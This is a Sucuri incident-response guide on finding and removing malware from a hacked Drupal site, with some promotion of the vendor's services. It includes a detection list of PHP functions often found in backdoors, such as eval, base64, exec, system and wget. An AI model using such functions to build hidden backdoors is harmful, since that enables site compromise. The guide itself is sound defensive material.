HOW TO CLEAN A HACKED DRUPAL SITE

Fix the hack and protect your Drupal website.

Sucuri is committed to helping server administrators check their website for hacks and remove malware infections. We created this guide so Drupal users can identify and fix a Drupal hack. This is not meant to be an all-encompassing guide, but it addresses the most common infections we see.

Managua • Nicaragua • Home of Sucuri's
Salvador - Security Analyst, Pilar - Paid Acquisition Specialist

Step 1

IDENTIFY HACK

Before you begin, it’s wise to create a backup of everything for forensic analysis of the hack if required. This is especially important for larger websites and industries where legal issues or HIPAA and PCI compliance breaches may be a concern.

As an optional step, you may want to document the steps you take to identify, remediate, and protect your Drupal site. This could prove useful down the line if you run into similar issues, or to follow up with your project stakeholders.

As described in the official Drupal guide for hacked sites, you should decide whether you wish to investigate and fix the hack, rollback, or rebuild your site. This guide focuses on how to clean the infection manually. If you need help, we offer affordable plans to clean and protect your Drupal site year-round.

Common Indicators of a Hacked Drupal Site

  • Spam keywords in nodes and search engine content
  • New nodes from an unauthorized user
  • File modifications or Drupal core integrity issues
  • Unknown files under sites/default/files
  • Security warnings by Google, Bing, McAfee, etc.
  • Unexpected, slow, or abnormal site behavior
  • Host suspended your site for malicious activity
  • Malicious new users in the Drupal dashboard.

1.1 Scan Your Site

You can use tools that scan your site remotely to find malicious payloads and malware locations. These instructions are for our free remote scanner, SiteCheck. Other online scanners and Drupal extensions can also help you look for indicators of compromise, malicious payloads, and other security issues. Tools for checking security misconfigurations in Drupal could help you identify possible attack vectors.

To scan Drupal for hacks:

  1. Visit SiteCheck and enter your website URL.
  2. Click Scan Website.

  3. If the site is infected, review the warning message.

  4. Note any payloads, locations (if available), and blacklist warnings.

If you have multiple websites on the same server we recommend scanning them all. Cross-site contamination is one of the leading causes of reinfections. We encourage every website owner to isolate their hosting and web accounts. See the Drupal Multisite Docs for more info.

Drupal modules to scan your site:

  • Hacked!: Scans your Drupal software against known good copies (Drush UI available).
  • Site Audit: Detect common problems with Drupal including security issues.
  • Security Review: Test your site against a checklist of common security issues.

Other tools to scan your website:

Note

A remote scanner will check the site externally using different user-agents, but some issues do not present themselves in a browser. Hidden infections (i.e., backdoors, phishing pages, and hidden scripts) can be found using a server side scanner. Learn more about how remote scanners work.

1.2 Check Modified Files

New or recently modified Drupal files may be part of the hack. Your core, contributed, and custom modules should also be checked against known good copies to identify malware injections.

Note

We highly recommend using FTPS/SFTP/SSH rather than unencrypted FTP.

The quickest way to confirm the integrity of your Drupal files is by using git status (or another version control system) to check for changes, commit any new branches, and then roll back to the last known good set of code.

To use git to check for changes:

  1. Connect to your server over SSH and run the following SSH command: git status

  2. Identify new and modified files.

  3. Navigate through your directories and note anything unusual.

You can also use the Hacked! module for Drupal to get a report of any integrity issues with your core files and modules.

Caution

It is important that you compare the same version of your Drupal core files and extensions. Core files on the 8.x branch are not the same as the 7.x branch and so on.

Another option is to use the diff command in terminal to compare to the known good files. You can find all Drupal versions on GitHub. Using an SSH terminal, you can download Drupal locally. The following commands use version 8.3.5 as an example of the clean files and public_html as an example of where your Drupal installation is located. The final diff command will compare the clean Drupal files with your installation.

To check core file integrity with SSH commands:

  • $ mkdir drupal-8.3.5
  • $ cd drupal-8.3.5
  • $ wget https://github.com/drupal/core/archive/8.3.5.tar.gz
  • $ tar -zxvf core-8.3.5.tar.gz
  • $ diff -r core-8.3.5 ./public_html

To manually check recently modified files:

  1. Log into your server using an FTP client or SSH terminal.

  2. If using SSH, you can list all files modified in the last 15 days using this command: $ find ./ -type f -mtime -15

  3. If using SFTP, review last modified date column for all files on the server.

  4. Note any files that have been recently modified.

Unfamiliar modifications in the last 7-30 days may be suspicious and require further investigation.

1.3 Audit User Logs

Verify any unknown Drupal user accounts, especially administrators.

To check for malicious users in Drupal:

  1. Log into your Drupal admin interface (yoursite.com/user/login)

  2. Click People on the menu.

  3. Review the list, especially ones recently created under the Member For column.

  4. Remove any unfamiliar users that were created by hackers.

  5. Check the Last Access Time of legitimate users (may indicate compromised account).

  6. Confirm any users that logged in at suspicious times.

Note

Wait to change user passwords until after you have completely cleared the site of malware. This ensures that hackers no longer have access to any user accounts. You can use a module like Mass Password Reset to force all users to reset their passwords.

You can also parse your server logs if you know how to search for requests to the /user/login area. Any Drupal users who have logged in at unusual times or geographic locations may have been compromised.

1.4 Check Diagnostic Pages

If your Drupal site has been blacklisted by Google or other website security authorities, you can use their diagnostic tools to check the security status of your Drupal website.

For more information about these security warnings, read our guide explaining the Google blacklist.

To check your Google Transparency Report:

  1. Visit the Safe Browsing Site Status website.

  2. Enter your site URL and search.

  3. On this page you can check:

    • Site Safety Details (information about malicious redirects, spam and downloads).
    • Testing Details (most recent Google scans that found malware).

If you have added your site to any free webmaster tools, you can check their security ratings and reports for your website. If you do not already have accounts for these free monitoring tools, we highly recommend that you sign up:

Step 2

FIX HACK

Now that you have identified potentially compromised users and malware locations, you can remove malware from Drupal and restore your website to a clean state.

Pro Tip:

The best way to identify hacked files is by comparing the current state of the site with an old and clean backup. If a backup is available, you can use that to compare the two versions and identify what has been modified.

Note

Some of these steps require web server and database access. If you are not familiar with manipulating database tables or editing PHP, please seek assistance from a professional Incident Response Team member who can completely remove Drupal malware.

2.1 Clean Hacked Website Files

If any scans or diagnostic pages revealed malicious domains or payloads, you can start by looking for those files on your Drupal web server.

If you use a version control system like git, you can rollback to a known good copy, delete new suspicious files, and checkout to revert any maliciously modified files.

By comparing infected files with known good files (from official sources or reliably clean backups) you can identify and remove malicious changes.

Caution

It is important that you compare the same version of your Drupal core files and extensions. Core files on the 8.x branch are not the same as the 7.x branch and so on.

Never perform any actions without a backup. If you need help with this, review the official Drupal Backup Docs or look into free Drupal backup tools such as Backup and Migrate and Node Squirrel.

To manually remove a malware infection from your Drupal files:

  1. Log into your server via SFTP or SSH.

  2. Create a backup of the site files before making changes.

  3. Search your files for reference to malicious domains or payloads you noted.

  4. Identify recently changed files and confirm whether they are legitimate.

  5. Review files flagged during the core file integrity check.

  6. Restore or compare suspicious files with clean backups or official sources.

  7. Remove any suspicious or unfamiliar code from your custom files.

  8. Test to verify the site is still operational after changes.

If you can't find the malicious content, try searching the web for malicious content, payloads, and domain names that you found in the first step. Chances are that someone else has already figured out how those domain names are involved in the hack you are attempting to clean.

Top Drupal directories where we find malware infections:

  • ./sites/all/modules/panels/help/
  • ./sites/all/themes/
  • ./profiles

Other tools to scan your website:

2.2 Clean Hacked Database Tables

To remove a malware infection from your Drupal database, you need to open a database admin panel, such as PHPMyAdmin. You can also use tools like Search-Replace-DB or Adminer.

To manually remove a malware infection from Drupal database tables:

  1. Log into your database admin panel.

  2. Make a backup of the database before making changes.

  3. Search for suspicious content (i.e., spammy keywords, links).

  4. Open the table that contains suspicious content.

  5. Manually remove any suspicious content.

  6. Test to verify the site is still operational after changes.

  7. Remove any database access tools you may have uploaded.

You can manually search your Drupal database for common malicious PHP functions, such as eval, base64_decode, gzinflate, preg_replace, str_replace, etc. Note that these functions are also used by Drupal extensions for legitimate reasons, so be sure you test changes or get help so you do not accidentally break your site.

Drupal database hack example
Click to View

Caution

Manually removing “malicious” code from your website files can be extremely hazardous to the health of your website. Never perform any actions without a backup. If you’re unsure, please seek assistance from a professional.

Top infected Drupal database tables we see:

  • field_data_body
  • field_revision_body
  • cache_field

2.3 Remove Hidden Backdoors

Hackers always leave a way to get back into your site. More often than not, we find multiple backdoors of various types in hacked Drupal sites.

Backdoors are usually embedded in files that are named just like legitimate files within the official Drupal framework but located in the wrong directories. Attackers can also inject backdoors into files like index.php and directories like /modules, /themes, /sites/all/modules, and /sites/all/themes.

Backdoors commonly include the following PHP functions:

  • base64
  • str_rot13
  • gzuncompress
  • gzinflate
  • eval
  • exec
  • create_function
  • location.href
  • curl_exec
  • stream
  • system
  • assert
  • stripslashes
  • preg_replace (with /e/)
  • move_uploaded_file
  • strrev
  • file_get_contents
  • encodeuri
  • wget

Caution

These functions can also be used legitimately by Drupal extensions, so be sure to test any changes because you could break your site by removing benign functions.

Always remember to compare files using the same Drupal version.

To remove backdoors by comparing files:

  1. Confirm your Drupal version by clicking the System menu and opening System Information.

  2. Download the same version of known good core files from the version official Drupal repository.

  3. Log into your server via SFTP or SSH.

  4. Create a backup of the site files before making changes.

  5. In your FTP client, compare your site with the known good download.

  6. Investigate any new files on your server that do not match the known good files.

  7. Investigate any files that are not the same size as the known good files.

  8. If using version control, commit and push the new code.

Drupal file system
Drupal 8 - Click to View

The majority of malicious code we see uses some form of encoding to prevent detection. Aside from premium components that use encoding to protect their authentication mechanism, it's very rare to see encoding in the official Drupal repository.

It is critical that all backdoors are closed in order to successfully clean a Drupal hack, otherwise your site will be reinfected quickly.

2.4 Fix Malware Warnings

If you were blacklisted by Google, McAfee, Yandex (or any other web spam authorities), you can request a review after the hack has been fixed. Google is now limiting known repeat offenders to one review request every 30 days. Be sure your site is clean before requesting a review!

For more details on how to remove website security warnings, read our guide explaining how to remove the Google blacklist.

To remove malware warnings on your site:

  1. Call your hosting company and ask them to remove the suspension.

    • You may need to provide details about how you removed the malware.
  2. Fill in a review request form for each blacklisting authority.

    • ie. Google Search Console, McAfee SiteAdvisor, Yandex Webmaster.
  3. The review process can take several days.

Note

With the Sucuri Platform, we submit blacklist review requests on your behalf. This helps ensure your site is absolutely ready for review. Some reviews however, such as web spam hacks as a result of manual actions, can take up to two weeks.

Back to Top

Step 3

POST - HACK

In this final step, you will learn how to fix the issues that caused Drupal to be hacked in the first place. You will also perform essential steps to enhance the security of your Drupal site.

3.1 Update and Reset

Outdated software is one of the leading causes of infection, and it is important to remove any known vulnerable extensions. Though Drupal uses a secure hashing algorithm to prevent passwords from being hacked, it’s always a good idea to reset passwords to ensure you are not reinfected if hackers gained access to your credentials.

Clear Active Sessions

If a user account has been compromised it’s important to log them out and force a password reset so they lose access to your site. The sessions table in your Drupal database keeps a record of every user login and you can remove them.

To clear active Drupal user sessions:

  1. Log into your database admin panel.

  2. Open the sessions table.

  3. Select Empty to remove all logs from the table.

  4. All users will now be logged out.

Reset API Keys

Your API keys in Drupal should be reset to ensure they have not been compromised by the attackers. Additionally, if your website connects to external services (such as marketing services, payment gateways, and shipping providers) it is a good idea to create new API keys created for those services.

We recommend using the Key module along with Lockr to ensure keys are managed offsite.

Update Drupal Core and Extensions

Update all Drupal software including core files, themes, and modules.

To check and update Drupal extensions:

  1. Make sure you have a recent backup of your site.

  2. Log into your Drupal admin interface.

  3. Click Reports on the menu item and check Available updates.

  4. Note any available updates and check for any module-specific update instructions.

To update Drupal software we recommend using Drush:

  1. Log into your server using an SSH terminal and run the command: drush up

  2. Follow the interface to select core and modules to update.

  3. Test your site to ensure the updated modules did not break any functionality.

  4. If using version control, commit and push the new code.

Drupal 8.x is where all new developments in core are happening. Drupal 7.x continues to receive updates for known vulnerabilities. We recommend keeping an eye on the Drupal Security page for security alerts. Users on the 6.x branch or lower are no longer receiving security patches and strongly encouraged to upgrade to 8.x by following the Drupal Upgrade Docs.

If SiteCheck identified other outdated software on your server (i.e., Apache, cPanel, PHP) in the first step of this guide, you should update those to ensure you have any available security patches.

If you cannot patch, consider activating a website application firewall to virtually patch your site.

If you are manually updating core files, follow the official upgrade docs for Drupal 8 and Drupal 7.

To manually update Drupal core files:

  1. Make sure you have a recent backup of your site.

  2. Click Configuration on the menu under Development select Maintenance mode.

  3. Delete everything except for the sites folder and custom files.

  4. Upload the new Drupal files, taking care not to overwrite custom files.

  5. Run the update.php file in your browser.

  6. Switch the site out of Maintenance mode and test.

Caution

Be careful not to overwrite the settings.php file (in /sites/default) file as this will break your site!

Clear Cache

Once you are sure everything has been cleaned and updated, as with any update to your site, you should clear the Drupal cache so the latest version of your site is visible to everyone. We recommend using Drush commands drush cache-rebuild (Drupal 8) or drush cache-clear all (Drupal 7).

To manually clear the Drupal cache:

  1. Log into your Drupal website.

  2. Click Configuration on the menu.

  3. Under Development click Performance.

  4. Click the Clear all caches button.

Reset User Credentials

You should reset all user passwords with unique, strong passwords to avoid reinfection.

To reset passwords for Drupal user accounts:

  1. Log into your Drupal administrator area.

  2. Click People on the menu.

  3. Click the Edit button under the Operations column for each user.

  4. Change the user’s password.

  5. Repeat for each user on your site.

You should reduce the number of administrator and super-administrator accounts for Drupal, and all of your website systems. Practice the concept of least privileged. Only give people the access they require to do the job they need.

Keep in mind that the first user created by Drupal during installation (User 1) is the most powerful user in the system. It has permissions above even administrators. Because of this it should not be regularly used. Instead, every administrator should have their own unique account so you can limit admin permissions.

Note

All accounts should use strong passwords - complex, long, and unique. We recommend using password manager and generators to simplify the process.

3.2 Set Backups

Backups function as a safety net. Now that your Drupal site is clean and you’ve taken some important post-hack steps, make a backup! Having a good backup strategy is at the core of a good security posture. For more information, review the Drupal Backup Docs. There are also some great free Drupal backup tools such as Node Squirrel.

Here are some tips to help you with website backups:

  • Location

    Store Drupal backups in an off-site location. Never store backups (or old versions) on your server; they can be hacked and used to compromise your real site.

  • Automatic

    Ideally your backup solution should run automatically at a frequency that suits the needs of your website.

  • Redundancy

    Store your backups in multiple locations (cloud storage, your computer, external hard drives).

  • Testing

    Try the restore process to confirm your website functions correctly.

  • File Types

    Some backup solutions exclude certain file types such as videos and archives.

Note:

If you are an existing customer, Sucuri offers an affordable system for secure website backups.

3.3 Scan Your Computer

Have all Drupal users run a scan with a reputable antivirus program on their operating systems.

Drupal can be compromised if a user with an infected computer has access to the dashboard. Some infections are designed to jump from a computer into text editors or FTP clients.

Here are some antivirus programs we recommend:

Note

You should have only one antivirus actively protecting your system to avoid conflicts. If your Drupal Dashboard user’s computers are not clean, your site can get reinfected easily.

3.4 Protect Your Site

You can harden your Drupal site by restricting file permissions and implementing custom .htaccess or nginx.conf rules. We recommend reviewing the Drupal Security Docs to learn how.

There are a number of modules and tools that can help you protect your Drupal site and prevent a future hack. Many are free and can make it easier to manage specific aspects of website security. A good website security plan includes protection, monitoring, and response.

Recommended security modules for Drupal:

  • Security Review: Test your site against a checklist of common security issues.
  • Paranoia: Prevents PHP code execution in certain areas and prevents risky permissions being granted.
  • Password Policy: Define user password policies and strength requirements.
  • TFA: Adds another layer to password security using two-factor authentication options.
  • HoneyPot: Protects your login and web forms from being submitted by malicious bots.
  • Automated Logout: Automatically log users out after a period of inactivity.
  • Login Security: Limit login attempts and whitelist access using allowed IP addresses.
  • Spam Span: Obfuscates email addresses to stop spammers from abusing them.
  • Encrypt: Enables encrypted communication allowing modules to keep data secured.
  • Real AES: An authenticated encryption method plugin for the Encrypt module.
  • Key: A module that allows other modules to encrypt, filter, and validate data.
  • Lockr: Secure, offsite storage and management of API and encryption keys.
  • Site Audit: Detect common problems with Drupal including security issues.
  • Permissions Lock: Fine-tune user roles and ability to grant permissions.
  • Secure Permissions: Enforces permission management via code instead of UI.
  • Mass Password Reset: Force password resets for users if they are lost or stolen.
  • Guardr: Distribution modules and settings for enterprise security.

Drupal is a complex and highly extensible CMS, and software vulnerabilities are difficult to predict. Trying to keep up with security patches is challenging for administrators. Website application firewalls provide a perimeter defense system surrounding your website and blocking malicious requests. Trying to keep up is challenging for administrators.

Benefits to using a website firewall:

  1. Prevent a Future Hack

    By detecting and stopping known hacking methods and behaviors, a website firewall keeps your site protected against infection in the first place, including the OWASP Top 10 vulnerabilities.

  2. Virtual Security Update

    Known vulnerabilities are constantly being exploited, and new zero-day attacks are always emerging. A good website firewall will virtually patch and harden your holes in your website software even if you can’t apply security updates in time.

  3. Block Brute Force Attack

    A website firewall should stop anyone from accessing your Drupal admin interface if they aren't supposed to be there, making sure they can’t use brute force automation to guess your user passwords.

  4. Mitigate DDoS Attack

    Distributed Denial of Service (DDoS) attacks attempt to overload your server or web application resources. By detecting and blocking all types of DDoS attacks, a website firewall ensures availability and uptime.

  5. Performance Optimization

    Most WAFs will offer a CDN caching for faster global page speed. This keeps your visitors happy and is proven to lower bounce rates while improving website engagement, conversions, and search engine rankings.

If you would like help protecting your website, we are available to chat with you about the benefits of using a website application firewall.

After taking steps to secure your Drupal site against future hacks, be sure to keep a record along with your mitigation and identification steps.

Please share this guide if you found it useful and help promote website security education to other website owners. Let us know if you have suggestions to improve this guide in the future.

Back to Top